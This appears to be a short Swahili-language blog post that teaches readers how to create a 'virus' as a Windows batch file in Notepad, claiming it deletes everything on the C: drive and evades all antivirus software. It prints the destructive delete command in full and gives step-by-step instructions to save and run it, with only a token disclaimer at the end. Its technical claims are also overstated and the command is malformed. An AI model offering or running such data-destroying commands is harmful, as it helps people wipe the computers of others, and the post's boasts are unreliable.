katika andiko hili nitawafundisha njia rahisi na yenye nguvu zaidi naweza nikasema nikirusi chenye nguvu zaidi katika computer kama ujuavyo viruso vingi katika computer huwa katika format ya Bat
hauitaji kuwa na software yeyote kutengeneza kirusi hiki unachotakiwa ni kufahau tu program ya Noteoad ilipo katika computer yako uzuri wa kirusi hiki hakiwezi kuonekana kwa antvirus yeyote ile
hiki kirusi kinafanya nini??
wakati mwingine unaweza jiuliza swali kama hili labda nikuambie tu kirusi hiki kinafuta local disc(C) drive yote inafuta kila kitu uzuri wa kirusi hikihakiwezi onekana kwa antivirus yeyote kama jinsi nilivyoandika hapo juu...
namna ya kutengeneza kirusi hiko
unachotakiwa kufanya ni ufungue notepad yako kisha copy hizi code kwa uangalifu zaidi kisha ziweke kwenye notepad yako
>>>> @Echo off Del C:\ *.* |y <<<
hizi alama za >>> na <<< hazihusiki hapo nimeweka ili ujue kilichopo ndani hapo ndiyo unapaswa ukiweke....
ukimaliza kuziweka code hizo kwenye notepad save fike hilo kwa jina lolote ila usisahau kuweka nukta na kisha kuandika kwa herufi ndogo neno BAT ni lazima ufanye hivyo
ukimalizaa unaweza run file hilo litafuta vitu vyote vilivyo kwenye drive ya local disc(C)
TAHADHARI usijaribu ku run file hilo kwenye computer yako au mahali popote bilankuwa na sababu maalum itapelekea kufuta vitu vyote vilivyo katika local disc yajo sitahusika ka chochote kitakachotokea kwenye computer yako.....
Comments
Post a Comment